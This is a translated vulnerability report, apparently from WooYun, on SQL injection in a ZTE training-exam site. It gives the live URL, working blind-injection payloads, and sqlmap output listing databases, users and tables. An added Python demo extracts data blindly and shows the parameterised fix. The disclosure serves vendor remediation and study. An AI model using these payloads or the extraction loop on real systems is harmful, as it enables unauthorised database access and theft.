
Vulnerability summary (24 followers)

Defect ID: wooyun-2014-052183

Title: SQL injection on a ZTE site

Vendor: ZTE Corporation (中兴通讯股份有限公司)

Author: U神

Submitted: 2014-03-01 16:54

Fix time: 2014-04-15 16:55

Published: 2014-04-15 16:55

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-03-01: Details sent to the vendor; awaiting vendor response
2014-03-03: Vendor confirmed; details visible to the vendor only
2014-03-13: Details opened to core white hats and domain experts
2014-03-23: Details opened to regular white hats
2014-04-02: Details opened to intern white hats
2014-04-15: Details opened to the public

Brief description:

Details:

URL:http://univ1.zte.com.cn/XsExam/Application/ForePlatform/Exam_ErrorQestion_Analyse.aspx?examNo=55239&studentNO=20070910056177
Boolean-based blind injection (sqlmap output):
[*] starting at 17:58:26
[17:58:26] [INFO] resuming back-end DBMS 'oracle'
[17:58:26] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: examNo
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: examNo=55239' AND 3796=3796 AND 'IqXn'='IqXn&studentNO=20070910056177
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: examNo=55239' AND 5439=DBMS_PIPE.RECEIVE_MESSAGE(CHR(84)||CHR(75)||CHR(97)||CHR(79),5) AND 'SRkp'='SRkp&studentNO=20070910056177
Place: GET
Parameter: studentNO
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: examNo=55239&studentNO=20070910056177' AND 4317=4317 AND 'fBuR'='fBuR
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: examNo=55239&studentNO=20070910056177' AND 1817=DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(99)||CHR(104)||CHR(76),5) AND 'alET'='alET
---
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: studentNO, type: Single quoted string (default)
[1] place: GET, parameter: examNo, type: Single quoted string
[q] Quit
>
[17:58:36] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Oracle
[17:58:36] [INFO] fetching current database
[17:58:36] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[17:58:36] [INFO] retrieved:
[17:58:37] [WARNING] reflective value(s) found and filtering out
XSEXAM
current schema (equivalent to database on Oracle): 'XSEXAM'
[17:59:08] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[17:59:08] [INFO] fetching database (schema) names
[17:59:08] [INFO] fetching number of databases
[17:59:08] [INFO] resumed: 30
[17:59:08] [INFO] resumed: ADAPTEXAM
[17:59:08] [INFO] resumed: AMP
[17:59:08] [INFO] resumed: CTXSYS
[17:59:08] [INFO] resumed: DBSNMP
[17:59:08] [INFO] resumed: DMSYS
[17:59:08] [INFO] resumed: DSC
[17:59:08] [INFO] resumed: DSCMD
[17:59:08] [INFO] resumed: EASK
[17:59:08] [INFO] resumed: ELEARNING
[17:59:08] [INFO] resumed: EMPTRAIN
[17:59:08] [INFO] resumed: EMPTRAIN2004
[17:59:08] [INFO] resumed: ETS
[17:59:08] [INFO] resumed: ETS_INTERFACE
[17:59:08] [INFO] resumed: EUNIV
[17:59:08] [INFO] resumed: EVALCENTER
[17:59:08] [INFO] resumed: EXFSYS
[17:59:08] [INFO] resumed: LHC
[17:59:08] [INFO] resumed: MAIL_SERVICE
[17:59:08] [INFO] resumed: MDSYS
[17:59:08] [INFO] resumed: OLAPSYS
[17:59:08] [INFO] resumed: ORDSYS
[17:59:08] [INFO] resumed: OUTLN
[17:59:08] [INFO] resumed: SYS
[17:59:08] [INFO] resumed: SYSMAN
[17:59:08] [INFO] resumed: SYSTEM
[17:59:08] [INFO] resumed: TSMSYS
[17:59:08] [INFO] resumed: WMSYS
[17:59:08] [INFO] resumed: XDB
[17:59:08] [INFO] resumed: XSEXAM
[17:59:08] [INFO] resumed: ZTETRAIN
available databases [30]:
[*] ADAPTEXAM
[*] AMP
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] DSC
[*] DSCMD
[*] EASK
[*] ELEARNING
[*] EMPTRAIN
[*] EMPTRAIN2004
[*] ETS
[*] ETS_INTERFACE
[*] EUNIV
[*] EVALCENTER
[*] EXFSYS
[*] LHC
[*] MAIL_SERVICE
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] XSEXAM
[*] ZTETRAIN
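Added example (not part of the original report, and not ZTE's code): a self-contained Python model of the boolean-based blind injection sqlmap found on examNo and studentNO. An in-memory SQLite database stands in for the Oracle backend, so the time-based DBMS_PIPE.RECEIVE_MESSAGE variant is not modelled; the table and column names, the secret value XSEXAM and the functions vulnerable_lookup, safe_lookup and blind_extract are all constructed for the demo. The vulnerable function shows the string-concatenation pattern that makes the reported payload (55239' AND 3796=3796 AND 'IqXn'='IqXn) evaluate to true, blind_extract recovers a value one character at a time from nothing but that true/false page behaviour, and the parameterised version shows the fix.

```python
"""
Added example (not from the original report): a stand-alone model of the
boolean-based blind SQL injection sqlmap reported on the examNo / studentNO
parameters. An in-memory SQLite database stands in for the Oracle backend;
table, column and function names are constructed for the demo.
"""
import sqlite3
import string

# Constructed sample data standing in for the XsExam schema (assumption).
_conn = sqlite3.connect(":memory:")
_conn.executescript("""
CREATE TABLE exam_answer (exam_no TEXT, student_no TEXT, wrong_q TEXT);
INSERT INTO exam_answer VALUES ('55239', '20070910056177', 'Q7');
CREATE TABLE secret (name TEXT);
INSERT INTO secret VALUES ('XSEXAM');
""")


def vulnerable_lookup(exam_no: str, student_no: str) -> bool:
    """Flawed pattern: request parameters concatenated into the SQL text.
    Returns True when at least one row comes back, i.e. when the page would
    render wrong-question analysis; that visible difference is the only
    signal a boolean-based blind attack needs."""
    sql = ("SELECT wrong_q FROM exam_answer WHERE exam_no = '" + exam_no
           + "' AND student_no = '" + student_no + "'")
    return _conn.execute(sql).fetchone() is not None


def safe_lookup(exam_no: str, student_no: str) -> bool:
    """Hardened form: bound parameters, so input cannot alter the query shape."""
    sql = "SELECT wrong_q FROM exam_answer WHERE exam_no = ? AND student_no = ?"
    return _conn.execute(sql, (exam_no, student_no)).fetchone() is not None


def blind_extract(lookup, max_len: int = 32) -> str:
    """Recover secret.name one character at a time using only the True/False
    answer from lookup(). Payload shape follows the report's finding:
        55239' AND <condition> AND 'x'='x
    with <condition> testing one character of the target value. A linear
    scan over the alphabet is used for readability; sqlmap does a binary
    search over character codes instead."""
    alphabet = string.ascii_uppercase + string.digits + "_$"
    recovered = ""
    for pos in range(1, max_len + 1):
        hit = None
        for ch in alphabet:
            condition = f"(SELECT substr(name,{pos},1) FROM secret)='{ch}'"
            payload = f"55239' AND {condition} AND 'x'='x"
            if lookup(payload, "20070910056177"):
                hit = ch
                break
        if hit is None:      # substr() past the end matches nothing: finished
            break
        recovered += hit
    return recovered


if __name__ == "__main__":
    print("vulnerable path leaks:", blind_extract(vulnerable_lookup))      # XSEXAM
    print("parameterised path leaks:", repr(blind_extract(safe_lookup)))  # ''
```

Run directly, the vulnerable path leaks XSEXAM character by character while the parameterised path leaks nothing, because the injected text is compared as a literal exam number rather than parsed as SQL. Against the real Oracle backend the same loop would test SUBSTR of an expression such as SYS_CONTEXT('USERENV','CURRENT_SCHEMA'), which is how sqlmap obtained the schema name shown in the output above; the fix on the ASP.NET side is the same, bind parameters instead of building the query from examNo and studentNO.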

Proof:

Users:
database management system users [49]:
[*] ADAPTEXAM
[*] AMP
[*] ANONYMOUS
[*] BACKUPUSER
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] DSC
[*] DSCMD
[*] EASK
[*] ELEARNING
[*] EMPTRAIN
[*] EMPTRAIN2004
[*] ETS
[*] ETS_INTERFACE
[*] EUNIV
[*] EVALCENTER
[*] EXFSYS
[*] HR_SLT
[*] LHC
[*] MAIL_SERVICE
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] NC_READER
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TIVOLI
[*] TO_DSS
[*] TO_ESEARCH
[*] TO_ETS
[*] TO_FOL
[*] TO_HR
[*] TPG
[*] TSMSYS
[*] UNIVARCHIVE
[*] UNIVDB_DMOLVIEW
[*] WMSYS
[*] XDB
[*] XSEXAM
[*] ZTETRAIN
Tables:
Database: DMSYS
[2 tables]
+-------------------+
| DM$P_MODEL |
| DM$P_MODEL_TABLES |
+-------------------+
It was quite slow, so I stopped running it here..
[18:08:06] [INFO] fetching tables for database: 'XSEXAM'
[18:08:06] [INFO] fetching number of tables for database 'XSEXAM'
[18:08:06] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[18:08:06] [INFO] retrieved:
[18:08:08] [WARNING] reflective value(s) found and filtering out
142
[18:08:28] [INFO] retrieved: TMP_ANSWER_LOG_TMP
[18:12:30] [INFO] retrieved: ATMP_ID
[18:14:10] [INFO] retrieved: ATMP_ID_UPDID
[18:15:54] [INFO] retrieved: BACKUP_1
[18:17:42] [INFO] retrieved: CHECK_EMPLOYEEBASE_INFO
[18:22:34] [INFO] retrieved: EXAM_ANSWER_57721
[18:26:21] [INFO] retrieved: EXAM_ANSWER_TEMP_UPDID
[18:29:05] [INFO] retrieved: EXAM_AUTOJUDGE_QUEUE
[18:32:20] [INFO] retrieved: EXAM_BASE_DEFINE
[18:34:57] [INFO] retrieved: EXAM_COPY_SUCCEED
[18:37:48] [INFO] retrieved: EXAM_COPY_SUCCEED_UPDID
[18:39:52] [INFO] retrieved: EXAM_DIC_DIFFICULT
[18:42:51] [INFO] retrieved: EXAM_EXAMINATION_EX
[18:46:10] [INFO] retrieved: EXAM_FILE_QUEUE
[18:48:33] [INFO] retrieved: EXAM_FILE_QUEUE_HISTORY
[18:50:57] [INFO] retrieved: EXAM_GROUP_INFO
[18:53:27] [INFO] retrieved: EXAM_GROUP_INFO_UPDID
[18:55:31] [INFO] retrieved: EXAM_GROUP_USER
[18:56:56] [INFO] retrieved: EXAM_GROUP_USER_UPDID
[18:58:55] [INFO] retrieved: EXAM_JUDGING_CONFIG
[19:02:11] [INFO] retrieved: EXAM_JUDGING_CONFIG_UPDID
[19:04:20] [INFO] retrieved: EXAM_LEVEL_TEMPLATE_UPDID
[19:08:58] [INFO] retrieved: EXAM_MEMBERLIST
[19:11:21] [INFO] retrieved: EXAM_OBJECT_EXAM
[19:13:58] [INFO] retrieved: EXAM_OBJECT_EXAM_TEST
[19:15:53] [INFO] retrieved: TMP_ANSWER_LOG_71913
[19:20:18] [INFO] retrieved: EXAM_TQ_EES_BL_UPDID
[19:24:42] [INFO] retrieved: EXAM_TQ_EES_CA
[19:25:43] [INFO] retrieved: EXAM_TQ_EES_CA_UPDID
[19:27:39] [INFO] retrieved: EXAM_TQ_EES_GR
[19:28:42] [INFO] retrieved: EXAM_TQ_EES_GR_SELITEMS
[19:31:15] [INFO] retrieved: EXAM_TQ_EES_GR_UPDID
[19:33:01] [INFO] retrieved: EXAM_TQ_EES_JU
[19:34:04] [INFO] retrieved: EXAM_TQ_EES_JU_UPDID
[19:36:09] [INFO] retrieved: EXAM_TQ_EES_LI
[19:37:12] [INFO] retrieved: EXAM_TQ_EES_LI_SELITEMS
[19:39:46] [INFO] retrieved: EXAM_TQ_EES_LI_UPDID
[19:41:32] [INFO] retrieved: EXAM_TQ_EES_MS
[19:42:35] [INFO] retrieved: TMP_ANSWER_20090617_2
[19:47:22] [INFO] retrieved: TMP_ANSWER_20090617_2_UPDID
[19:49:36] [INFO] retrieved: TMP_ANSWER_20090617_UPDID
[18:41:29] [INFO] fetching tables for database: 'SYSMAN'
[18:41:29] [INFO] fetching number of tables for database 'SYSMAN'
[18:41:29] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[18:41:29] [INFO] retrieved:
[18:41:30] [WARNING] reflective value(s) found and filtering out
341
[18:41:52] [INFO] retrieved: MGMT_CREDENTIAL_SETS
[18:46:23] [INFO] retrieved: MGMT_CREDENTIAL_SET_COLUMNS
[18:49:05] [INFO] retrieved: MGMT_CREDENTIALS2
[18:50:18] [INFO] retrieved: MGMT_NOTIFY_QTABLE
[18:53:28] [INFO] retrieved: AQ$_MGMT_NOTIFY_QTABLE_S
[18:58:57] [INFO] retrieved: SYS_IOT_OVER_50179
[19:03:07] [INFO] retrieved: MGMT_VERSIONS
[19:06:12] [INFO] retrieved: MGMT_TABLE_SIZES
[19:08:56] [INFO] retrieved: MGMT_INDEX_SIZES
[19:11:42] [INFO] retrieved: MGMT_REBUILD_INDEXES
[19:15:21] [INFO] retrieved: MGMT_LICENSES
[19:17:25] [INFO] retrieved: MGMT_AVAILABILITY
[19:20:17] [INFO] retrieved: MGMT_CURRENT_AVAILABILITY
[19:24:59] [INFO] retrieved: MGMT_AVAILABILITY_MARKER
[19:29:21] [INFO] retrieved: MGMT_MASTER_AGENT
[19:32:18] [INFO] retrieved: MGMT_MASTER_CHANGED_CALLBACK
[19:36:22] [INFO] retrieved: MGMT_TARGET_BASELINES
[19:40:09] [INFO] retrieved: MGMT_TARGET_BASELINES_DATA
[19:42:11] [INFO] retrieved: MGMT_METRICS
[19:44:03] [INFO] retrieved: MGMT_METRICS_EXT
[19:45:40] [INFO] retrieved: MGMT_TARGET_TYPES
[19:48:41] [INFO] retrieved: MGMT_TARGETS
[19:49:31] [INFO] retrieved: MGMT_TYPE_PROPER

Fix recommendation:

Copyright notice: when reposting, please credit the source: U神@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2014-03-03 09:18

Vendor reply:

Thanks U神, the vulnerability will be fixed as soon as possible. Thank you.

Latest status:

None yet